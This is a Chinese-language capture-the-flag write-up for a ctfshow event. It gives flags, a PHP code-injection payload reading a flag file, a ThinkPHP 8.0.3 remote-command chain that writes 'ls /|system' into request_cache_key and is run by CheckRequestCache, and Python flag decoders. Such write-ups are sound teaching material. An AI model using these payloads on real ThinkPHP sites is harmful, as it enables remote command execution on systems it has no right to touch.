misc
二维码拼图
ctfshow{2408979e-b2be-4442-b4d9-679ccb5b8298}
web
CodeInject
1=system("cat /000f1ag.txt")
ctfshow{375b20aa-248f-421d-b570-cfdbf5fab5d6}
tpdoor
给了部分源码
<?php
namespace app\controller;
use app\BaseController;
use think\facade\Db;
/**
 * Challenge controller as given in the write-up (the page reports the
 * framework as ThinkPHP V8.0.3 from an error message).
 *
 * The only action rewrites config/route.php from request parameters.
 * CheckRequestCache is registered in $middleware; according to the framework
 * excerpt further down this page it reads request_cache_key from that same
 * file on every request, so what this action persists is consumed by
 * framework code, not only by this controller.
 */
class Index extends BaseController
{
    protected $middleware = ['think\middleware\AllowCrossDomain','think\middleware\CheckRequestCache','think\middleware\LoadLangPack','think\middleware\SessionInit'];

    /**
     * Enable or disable request caching by rewriting config/route.php.
     *
     * @param mixed $isCache   bound from the request (a string when passed via GET);
     *                         stored verbatim as request_cache_key
     * @param mixed $cacheTime cache lifetime in seconds, cast with intval()
     * @return string status message
     *
     * No authentication or authorization check guards this config write.
     */
    public function index($isCache = false , $cacheTime = 3600)
    {
        // Loose (==) comparison: any truthy value, including a non-empty
        // string from GET, enters this branch, and that raw value (not `true`)
        // is what gets written below.
        if($isCache == true){
            $config = require __DIR__.'/../../config/route.php';
            // Unvalidated request value persisted into framework config.
            // Hardening: validate as a real boolean (filter_var with
            // FILTER_VALIDATE_BOOLEAN) and store `true`, never the raw input.
            $config['request_cache_key'] = $isCache;
            $config['request_cache_expire'] = intval($cacheTime);
            $config['request_cache_except'] = [];
            // var_export() serialises the array as PHP source and the file
            // is overwritten in place; the write-up states the framework
            // re-reads it on later requests.
            file_put_contents(__DIR__.'/../../config/route.php', '<?php return '. var_export($config, true). ';');
            return 'cache is enabled';
        }else{
            return 'Welcome ,cache is disabled';
        }
    }
}
报错发现版本为V8.0.3
第 21 行是关键位置:有文件写入,估计是利用 route.php
查看thinkphp源码
/config/route.php
通过
$config = require __DIR__.'/../../config/route.php';
$config['request_cache_key'] = $isCache;
GET 传参 isCache 即可改变 $config 中 request_cache_key 对应的值,然后通过 file_put_contents(__DIR__.'/../../config/route.php', '<?php return '. var_export($config, true). ';'); 覆写进 route.php
在中间件 WWW\tp\vendor\topthink\framework\src\think\middleware\CheckRequestCache.php 中,每次请求都会读取 route.php 中 request_cache_key 对应的值,赋给 $key,再传入 parseCacheKey 函数
而parseCacheKey中
if (true === $key) {
// 自动缓存功能
$key = '__URL__';
} elseif (str_contains($key, '|')) {
[$key, $fun] = explode('|', $key);
}
及
if (isset($fun)) {
$key = $fun($key);
}
$key 通过 explode 函数按 '|' 分割:'|' 前为 $key,'|' 后为 $fun,因此可以构造 [参数]|[可变函数]
执行RCE
因此,我们先get传一次?isCache=ls /|system
覆写进route.php
再任意请求一次传入中间件CheckRequestCache.php中parseCacheKey函数执行
发现只能执行一次,后续无论怎么请求都是执行 ls /,其实是全局请求缓存有效时间被固定为 3600s 写入 config 了
每次传的时候设置一下cacheTime就行,如
?isCache=ls%20/|system&cacheTime=3
ctfshow{0a2bb4b0-ec7c-404f-abc5-ffa9b4bbef8b}
RE
pe
修复 PE 头即可获得 flag
CTFShow{i95f5417b37c5e8019372de8737fI}
一个西瓜切两半你一半我一半
pyc逆向
正宗太极: 一个西瓜切两半你一半我一半
乃乾觅甯剏乳厡侻丨厏扝乌博丿乜规甲剌乶厝侥丿卻扚丠厘丿乎覟瓬剤
#!/usr/bin/env python
# visit https://tool.lu/pyc/ for more information
# Version: Python 3.6
# Encoder recovered from the .pyc: each flag character is shifted down by 32,
# then the code point of the cycling key character is added to it.
flag = 'ctfshow{this_is_fake_flag}'
key = '这是假的密钥'
# Step 1: shift every code point down by 32.
tmp = ''.join(chr(ord(ch) - 32) for ch in flag)
# Step 2: add the key character at the same position (the key repeats).
crypt = ''.join(
    chr(ord(ch) + ord(key[idx % len(key)]))
    for idx, ch in enumerate(tmp)
)
print(crypt)
解密
# Inverse of the recovered encoder: subtract the cycling key character's code
# point from each ciphertext character, then shift the result back up by 32.
crypt = '乃乾觅甯剏乳厡侻丨厏扝乌博丿乜规甲剌乶厝侥丿卻扚丠厘丿乎覟瓬剤'
key = '一个西瓜切两半你一半我一半'
# Step 1: undo the key addition (the key repeats every len(key) characters).
tmp = ''.join(
    chr(ord(ch) - ord(key[idx % len(key)]))
    for idx, ch in enumerate(crypt)
)
# Step 2: undo the -32 shift applied before the key was added.
flag = ''.join(chr(ord(ch) + 32) for ch in tmp)
print(flag)  # prints the recovered flag
ctfshow{Hell0_Reverse_Qi@n_D@0}
easy_re
探索进制的奥秘
CTFShow{Thank_CTFSHOW_Sky}
E
逆个🥚
本来盲猜换表,没想到直接base64
CTFSHOW{JIAMI_SHOW_YAN}
总结
web手web是做不了一点,RE倒是差点AK,果然,我不配当web手,重生之我是re手